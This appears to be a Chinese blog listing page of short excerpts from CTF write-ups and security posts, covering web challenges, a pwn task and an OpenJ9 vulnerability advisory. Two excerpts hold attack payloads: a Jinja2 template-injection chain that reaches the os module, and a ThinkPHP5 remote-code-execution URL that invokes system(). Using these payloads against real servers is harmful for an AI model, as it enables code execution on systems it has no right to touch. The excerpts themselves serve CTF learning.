1.判断存在python模块注入 {{7+7}} 2.{{''.__class__.__mro__[2].__subclasses__()}} 3.{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].li ...
分类:
编程语言 时间:
2020-03-12 18:47:17
阅读次数:
479
1.查看robots.txt页面 2.查看fl0g.php页面 ...
分类:
Web程序 时间:
2020-03-12 14:42:42
阅读次数:
74
1.thinkphp5 rce漏洞,构造payload, ?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20%27system("ls");%27 ...
分类:
Web程序 时间:
2020-03-12 14:18:31
阅读次数:
97
安华金和攻防实验室2018年提交给IBM的OpenJ9漏洞于近日完成修复,IBM推出补丁。由于这个漏洞(CVE-2018-12547)影响IBM产品多达400+、攻击复杂度低、危害大,CVE漏洞危害评分高达9.8。安华金和特此向广大用户告警,提醒OpenJ9用户及时下载IBM官网最新公布的补丁。 O ...
分类:
其他好文 时间:
2020-03-10 10:22:59
阅读次数:
122
题目: 打开网页之后,首先看到登录框,就想到弱密码和注入,先burp抓包发送尝试: 发现提示:你可能需要一个字典,应该就是弱密码,随手一个12345/123456成功了,要是尝试几个不成功的话,可能就得去跑字典了 ...
分类:
其他好文 时间:
2020-03-07 13:15:26
阅读次数:
67
题目: <?php show_source(__FILE__); include("config.php"); //文件包含函数 $a=@$_GET['a']; //获取参数a $b=@$_GET['b']; //获取参数b if($a==0 and $a){ //第一个判定条件 使构造条件成立 e ...
分类:
Web程序 时间:
2020-03-07 12:55:23
阅读次数:
196
题目 解题过程 扫了下端口和目录,没发现啥有用的信息。。。看了下提示,需要用到php源文件phps(咱之前没听说过) 访问:http://111.198.29.45:49502/index.phps,出现源码: <?php if("admin" $_GET[id]) { echo("<p>not a ...
分类:
Web程序 时间:
2020-03-06 17:54:22
阅读次数:
148
程序存在两个漏洞,gift存在格式化字符串漏洞,vuln存在栈溢出漏洞 这题和攻防世界的Mary_Morton类似,用格式化字符串漏洞泄露canary,然后就是常规的栈溢出来getshell,需要注意的是在gift里面只能输入6个字符 脚本如下 # -*- coding: utf-8 -*- fro ...
分类:
其他好文 时间:
2020-03-02 20:43:41
阅读次数:
93
1. 拉高视角,从宏观看网络安全攻防 伴随着信息化的发展,网络安全的问题就一直日益突出,与此同时,网络安全技术也成为研究热点,直到今日也没有停止。 从微观来看,网络安全技术研究指的是针对某项或某几项指标的完善,例如: 针对WEB系统漏洞的挖掘和利用,以及与此相应的日志采集以及关键点审计技术,例如RA ...
分类:
其他好文 时间:
2020-03-01 12:09:10
阅读次数:
158
题目(攻防世界): __construct和__destruct的魔术方法是默认执行的,我们可以忽视他们,__wake up执行以后会返回当前主页上,需要绕过,下面的正则匹配preg_match也需要绕过,flag在f14g.php里 绕过之后就需要传个var的值,值为base64编码以后的序列化 ...
分类:
Web程序 时间:
2020-02-20 17:00:18
阅读次数:
87
